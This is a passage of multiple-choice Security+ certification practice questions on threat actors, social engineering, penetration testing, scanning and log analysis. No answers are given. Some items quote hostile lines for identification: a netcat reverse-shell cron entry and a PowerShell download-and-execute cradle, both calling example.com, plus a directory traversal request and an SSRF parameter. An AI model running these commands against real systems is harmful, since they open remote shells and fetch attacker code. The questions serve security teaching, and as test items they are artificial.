D. Enabling JavaScript
149. What is the most significant difference between cloud service-based and on-premises
vulnerabilities?
A. Your ability to remediate it yourself
B. The severity of the vulnerability
C. The time required to remediate
D. Your responsibility for compromised data
150. Christina runs a vulnerability scan of a customer network and discovers that a consumer
wireless router on the network returns a result reporting default login credentials. What
common configuration issue has she encountered?
A. An unpatched device
B. An out of support device
C. An unsecured administrator account
D. An unsecured user account
151. What type of team is used to test security by using tools and techniques that an actual
attacker would use?
A. A red team
B. A blue team
C. A white team
D. A purple team
152. While reviewing web logs for her organization’s website Kathleen discovers the entry
shown here:
GET http://example.com/viewarticle.php?view=../../../config.txt HTTP/1.1
What type of attack has she potentially discovered?
A. A directory traversal attacks
B. A web application buffer overflow
C. A directory recursion attack
D. A slashdot attack
153. What is the key differentiator between SOAR and SIEM systems?
A. SOAR integrates with a wider range of applications.
B. SIEM includes threat and vulnerability management tools.
C. SOAR includes security operations automation.
D. SIEM includes security operations automation.
154. Your company has hired a penetration testing firm to test the network. For the test, you
have given the company details on operating systems you use, applications you run, and
network devices. What best describes this type of test?
A. Known environment test
B. External test
C. Unknown environment test
D. Threat test
155. What two files are commonly attacked using offline brute-force attacks?
A. The Windows registry and the Linux /etc/passwd file
B. The Windows SAM and the Linux /etc/passwd file
C. The Windows SAM and the Linux /etc/shadow file
D. The Windows registry and the Linux /etc/shadow file
156. What type of attack is an SSL stripping attack?
A. A brute-force attack
B. A Trojan attack
C. An on-path attack
D. A downgrade attack
157. What type of attack is the U.S. Trusted Foundry program intended to help prevent?
A. Critical infrastructure attacks
B. Metalwork and casting attacks
C. Supply chain attacks
D. Software source code attacks
158. Nicole wants to show the management in her organization real-time data about attacks
from around the world via multiple service providers in a visual way. What type of threat
intelligence tool is often used for this purpose?
A. A pie chart
B. A threat map
C. A dark web tracker
D. An OSINT repository
159. You have noticed that when in a crowded area, data from your cell phone is stolen. Later
investigation shows a Bluetooth connection to your phone, one that you cannot explain.
What describes this attack?
A. Bluejacking
B. Bluesnarfing
C. Evil twin
D. RAT
160. The type and scope of testing, client contact details, how sensitive data will be handled, and
the type and frequency of status meetings and reports are all common elements of what
artifact of a penetration test?
A. The black-box outline
B. The rules of engagement
C. The white-box outline
D. The close-out report
161. Amanda encounters a Bash script that runs the following command:
crontab -e 0 * * * * nc example.com 8989 -e /bin/bash
What does this command do?
A. It checks the time every hour.
B. It pulls data from example.com every minute.
C. It sets up a reverse shell.
D. None of the above
162. A penetration tester called a help desk staff member at the company that Charles works at
and claimed to be a senior executive who needed her password changed immediately due to
an important meeting they needed to conduct that would start in a few minutes. The staff
member changed the executive’s password to a password that the penetration tester provided.
What social engineering principle did the penetration tester leverage to accomplish this attack?
A. Intimidation
B. Scarcity
C. Urgency
D. Trust
163. Patrick has subscribed to a commercial threat intelligence feed that is only provided to subscribers
who have been vetted and who pay a monthly fee. What industry term is used to
refer to this type of threat intelligence?
A. Proprietary threat intelligence
B. OSINT
C. ELINT
D. Corporate threat intelligence
164. What threat hunting concept involves thinking like a malicious actor to help identify
indicators of compromise that might otherwise be hidden?
A. Intelligence fusion
B. Maneuver
C. Threat feed analysis
D. Bulletin analysis
165. What type of malicious actor will typically have the least amount of resources available
to them?
A. Nation-states
B. Script kiddies
C. Hacktivists
D. Organized crime
166. A SYN flood seeks to overwhelm a system by tying up all the open sessions that it can create.
What type of attack is this?
A. A DDoS
B. A resource exhaustion attack
C. An application exploit
D. A vulnerability exploit
167. A penetration tester calls a staff member for her target organization and introduces herself
as a member of the IT support team. She asks if the staff member has encountered a
problem with their system, then proceeds to ask for details about the individual, claiming
she needs to verify that she is talking to the right person. What type of social engineering
attack is this?
A. Pretexting
B. A watering hole attack
C. Prepending
D. Shoulder surfing
168. What term describes the use of airplanes or drones to gather network or other information
as part of a penetration test or intelligence gathering operation?
A. Droning
B. Air Snarfing
C. War flying
D. Aerial snooping
169. Gabby wants to protect a legacy platform with known vulnerabilities. Which of the following
is not a common option for this?
A. Disconnect it from the network.
B. Place the device behind a dedicated firewall and restrict inbound and outbound traffic.
C. Rely on the outdated OS to confuse attackers.
D. Move the device to a protected VLAN.
170. In the United States, collaborative industry organizations that analyze and share cybersecurity
threat information within their industry verticals are known by what term?
A. IRTs
B. ISACs
C. Feedburners
D. Vertical threat feeds
171. After running nmap against a system on a network, Lucca sees that TCP port 23 is open and
a service is running on it. What issue should he identify?
A. Low ports should not be open to the Internet.
B. Telnet is an insecure protocol.
C. SSH is an insecure protocol.
D. Ports 1-1024 are well-known ports and must be firewalled.
172. During a penetration test, Cameron gains physical access to a Windows system and uses a
system repair disk to copy cmd.exe to the %systemroot%\system32 directory while
renaming it sethc.exe. When the system boots, he is able to log in as an unprivileged user,
hit the Shift key five times, and open a command prompt with system-level access using
sticky keys. What type of attack has he conducted?
A. A Trojan attack
B. A privilege escalation attack
C. A denial-of-service attack
D. A swapfile attack
173. Adam wants to describe threat actors using common attributes. Which of the following list
is not a common attribute used to describe threat actors?
A. Internal/external
B. Resources or funding level
C. Years of experience
D. Intent/motivation
174. Madhuri is concerned about the security of the machine learning algorithms that her organization
is deploying. Which of the following options is not a common security precaution for
machine learning algorithms?
A. Ensuring the source data is secure and of sufficient quality
B. Requiring a third-party review of all proprietary algorithms
C. Requiring change control and documentation for all changes to the algorithms
D. Ensuring a secure environment for all development, data acquisition, and storage
175. Frank is part of a white team for a cybersecurity exercise. What role will he and his
team have?
A. Performing oversight and judging of the exercise
B. Providing full details of the environment to the participants
C. Providing partial details of the environment to the participants
D. Providing defense against the attackers in the exercise
176. Susan receives $10,000 for reporting a vulnerability to a vendor who participates in a
program to identify issues. What term is commonly used to describe this type of payment?
A. A ransom
B. A payday
C. A bug bounty
D. A zero-day disclosure
177. Charles sets the permissions on the /etc directory on a Linux system to 777 using the
chmod command. If Alex later discovers this, what should he report his finding as?
A. Open or weak permissions
B. Improper file handling
C. A privilege escalation attack
D. None of the above
178. During a penetration test, Kathleen gathers information, including the organization’s
domain name, IP addresses, employee information, phone numbers, email addresses, and
similar data. What is this process typically called?
A. Mapping
B. Footprinting
C. Fingerprinting
D. Aggregation
179. What term is used to describe mapping wireless networks while driving?
A. Wi-driving
B. Traffic testing
C. War driving
D. CARINT
180. Fred discovers that the lighting and utility control systems for his company have been overwhelmed
by traffic sent to them from hundreds of external network hosts. This has resulted
in the lights and utility system management systems not receiving appropriate reporting, and
the endpoint devices cannot receive commands. What type of attack is this?
A. A SCADA overflow
B. An operational technology (OT) DDoS
C. A network DDoS
D. An application DDoS
181. Ben runs a vulnerability scan using up-to-date definitions for a system that he knows has
a vulnerability in the version of Apache that it is running. The vulnerability scan does not
show that issue when he reviews the report. What has Ben encountered?
A. A silent patch
B. A missing vulnerability update
C. A false negative
D. A false positive
182. What type of technique is commonly used by malware creators to change the signature of
malware to avoid detection by antivirus tools?
A. Refactoring
B. Cloning
C. Manual source code editing
D. Changing programming languages
183. What term describes a military strategy for political warfare that combines conventional
warfare, irregular warfare, and cyberwarfare with fake news, social media influence strategies,
diplomatic efforts, and manipulation of legal activities?
A. Social warfare
B. Hybrid warfare
C. Social influence
D. Cybersocial influence campaigns
184. Chris is notified that one of his staff was warned via a text message that the FBI is aware
that they have accessed illegal websites. What type of issue is this?
A. A phishing attempt
B. Identity fraud
C. A hoax
D. An invoice scam
185. Sarah is reviewing the logs for her web server and sees an entry flagged for review that
includes the following HTTP request:
CheckinstockAPI=http://localhost/admin.php
What type of attack is most likely being attempted?
A. A cross-site scripting attack
B. Server-side request forgery
C. Client-side request forgery
D. SQL injection
186. Angela reviews bulletins and advisories to determine what threats her organization is likely
to face. What type of activity is this associated with?
A. Incident response
B. Threat hunting
C. Penetration testing
D. Vulnerability scanning
187. Why do attackers target passwords stored in memory?
A. They are encrypted in memory.
B. They are hashed in memory.
C. They are often in plain text.
D. They are often de-hashed for use.
188. The U.S. Department of Homeland Security (DHS) provides an automated indicator sharing
(AIS) service that allows for the federal government and private sector organizations to
share threat data in real time. The AIS service uses open source protocols and standards to
exchange this information. Which of the following standards does the AIS service use?
A. HTML and HTTPS
B. SFTP and XML
C. STIX and TRIX
D. STIX and TAXII
189. During what phase of a penetration test is information like employee names, phone number,
and email addresses gathered?
A. Exploitation
B. Establishing persistence
C. Reconnaissance
D. Lateral movement
190. During a penetration test, Angela obtains the uniform of a well-known package delivery service
and wears it into the target office. She claims to have a delivery for a C-level employee
she knows is there and insists that the package must be signed for by that person. What
social engineering technique has she used?
A. Impersonation
B. Whaling
C. A watering hole attack
D. Prepending
191. Nick purchases his network devices through a gray market supplier that imports them into
his region without an official relationship with the network device manufacturer. What risk
should Nick identify when he assesses his supply chain risk?
A. Lack of vendor support
B. Lack of warranty coverage
C. Inability to validate the source of the devices
D. All of the above
192. Christina wants to identify indicators of attack for XML-based web applications that her
organization runs. Where is she most likely to find information that can help her determine
whether XML injection is occurring against her web applications?
A. Syslog
B. Web server logs
C. Authentication logs
D. Event logs
193. What can Frank do to determine if he is suffering from a denial-of-service (DoS) attack
against his cloud hosting environment?
A. Nothing; cloud services do not provide security tools.
B. Call the cloud service provider to have them stop the DoS attack.
C. Review the cloud service provider’s security tools and enable logging and anti-DoS
tools if they exist.
D. Call the cloud service provider’s Internet service provider (ISP) and ask them to enable
DoS prevention.
194. Frank is using the cloud hosting service’s web publishing service rather than running his
own web servers. Where will Frank need to look to review his logs to see what types of
traffic his application is creating?
A. Syslog
B. Apache logs
C. The cloud service’s web logs
D. None of the above
195. If Frank were still operating in his on-site infrastructure, which of the following
technologies would provide the most insight into what type of attack he was seeing?
A. A firewall
B. An IPS
C. A vulnerability scanner
D. Antimalware software
196. Alaina wants to ensure that the on-site system integration that a vendor that her company is
working with is done in accordance with industry best practices. Which of the following is
not a common method of ensuring this?
A. Inserting security requirements into contracts
B. Auditing configurations
C. Coordinating with the vendor for security reviews during and after installation
D. Requiring an SOC report
197. Elias has implemented an AI-based network traffic analysis tool that requires him to allow
the tool to monitor his network for a period of two weeks before being put into full
production. What is the most significant concern he needs to address before using the AI’s
baselining capabilities?
A. The network should be isolated to prevent outbound traffic from being added to the
normal traffic patterns.
B. Compromised or otherwise malicious machines could be added to the baseline resulting
in tainted training data.
C. Traffic patterns may not match traffic throughout a longer timeframe.
D. The AI may not understand the traffic flows in his network.
198. What is the typical goal intent or goal of hacktivists?
A. Increasing their reputation
B. Financial gain
C. Making a political statement
D. Gathering high-value data
199. Where does the information for predictive analysis for threat intelligence come from?
A. Current security trends
B. Large security datasets
C. Behavior patterns
D. All of the above
200. Social Security numbers and other personal information are often stolen for what purpose?
A. Blackmail
B. Tailgating
C. Identity fraud
D. Impersonation
201. Security orchestration, automation, and response (SOAR) tools have three major components.
Which of the following is not one of those components?
A. Source code security analysis and testing
B. Threat and vulnerability management
C. Security incident response
D. Security operations automation
202. Direct access, wireless, email, supply chain, social media, removable media, and cloud are all
examples of what?
A. Threat intelligence sources
B. Threat vectors
C. Attributes of threat actors
D. Vulnerabilities
203. SourceForge and GitHub are both examples of what type of threat intelligence source?
A. The dark web
B. Automated indicator sharing sources
C. File or code repositories
D. Public information sharing centers
204. What is the root cause of improper input handling?
A. Improper error handling
B. Trusting rather than validating data inputs
C. Lack of user awareness
D. Improper source code review
205. Claire discovers the following PowerShell script. What does it do?
powershell.exe -ep Bypass -nop -noexit -c iex
((New ObjectNet.WebClient). DownloadString('https://example.com/file.psl))
A. Downloads a file and opens a remote shell
B. Uploads a file and deletes the local copy
C. Downloads a file into memory
D. Uploads a file from memory
206. Kathleen’s IPS flags traffic from two IP addresses as shown here:
Source IP: 10.11.94.111
http://example.com/home/show.php?SESSIONID=a3fghbby
Source IP: 192.168.5.34
http://example.com/home/show.php?SESSIONID=a3fghbby
What type of attack should she investigate this as?
A. A SQL injection attack
B. A cross-site scripting attack
C. A session replay attack
D. A server-side request forgery attack
207. There are seven impact categories that you need to know for the Security+ exam. Which of
the following is not one of them?
A. Data breaches
B. Data modification
C. Data exfiltration
D. Data loss
208. Which of the following research sources is typically the least timely when sourcing threat
intelligence?
A. Vulnerability feeds
B. Local industry groups
C. Academic journals
D. Threat feeds
209. While reviewing auth logs on a server that she maintains, Megan notices the following
log entries:
Apr 26 20:01:32 examplesys rshd[6101]: Connection from 10.0.2.15 on
illegal port
Apr 26 20:01:48 examplesys rshd[6117]: Connection from 10.0.2.15 on
illegal port
Apr 26 20:02:02 examplesys rshd[6167]: Connection from 10.0.2.15 on
illegal port
Apr 26 20:02:09 examplesys rshd[6170]: Connection from 10.0.2.15 on
illegal port
Apr 26 20:02:09 examplesys rshd[6172]: Connection from 10.0.2.15 on
illegal port
Apr 26 20:02:35 examplesys rshd[6188]: Connection from 10.0.2.15 on
illegal port
Apr 26 20:02:35 examplesys rlogind[6189]: Connection from 10.0.2.15 on
illegal port
What has she most likely detected?
A. A successful hacking attempt
B. A failed service startup
C. A vulnerability scan
D. A system reboot
210. The following graphic shows a report from an OpenVAS vulnerability scan. What should
Charles do first to determine the best fix for the vulnerability shown?
A. Disable PHP-CGI.
B. Upgrade PHP to version 5.4.
C. Review the vulnerability descriptions in the CVEs listed.
D. Disable the web server.
211. Ian runs a vulnerability scan, which notes that a service is running on TCP port 8080. What
type of service is most likely running on that port?
A. SSH
B. RDP
C. MySQL
D. HTTP
212. Rick runs WPScan against a potentially vulnerable WordPress installation. WPScan is a web
application security scanner designed specifically for WordPress sites. As part of the scan
results, he notices the following entry:
What should Rick do after remediating this vulnerability?
A. Install a web application firewall.
B. Review the patching and updating process for the WordPress system.
C. Search for other compromised systems.
D. Review IPS logs for attacks against the vulnerable plug-in.
213. Carolyn runs a vulnerability scan of a network device and discovers that the device is
running services on TCP ports 22 and 443. What services has she most likely discovered?
A. Telnet and a web server
B. FTP and a Windows fileshare
C. SSH and a web server
D. SSH and a Windows fileshare
214. Ryan needs to verify that no unnecessary ports and services are available on his systems, but
he cannot run a vulnerability scanner. What is his best option?
A. Passive network traffic capture to detect services
B. A configuration review
C. Active network traffic capture to detect services
D. Log review
215. Why is improper error handling for web applications that results in displaying error messages
considered a vulnerability that should be remediated?
A. Errors can be used to crash the system.
B. Many errors result in race conditions that can be exploited.
C. Many errors provide information about the host system or its configuration.
D. Errors can change system permissions.
216. Some users on your network use Acme Bank for their personal banking. Those users have
all recently been the victim of an attack, in which they visited a fake Acme Bank website and
their logins were compromised. They all visited the bank website from your network, and
all of them insist they typed in the correct URL. What is the most likely explanation for this
situation?
A. Trojan horse
B. IP spoofing
C. Clickjacking
D. DNS poisoning
217. John is a network administrator for Acme Company. He has discovered that someone has
registered a domain name that is spelled just one letter different than his company’s domain.
The website with the misspelled URL is a phishing site. What best describes this attack?
A. Session hijacking
B. Cross-site request forgery
C. Typo squatting
D. Clickjacking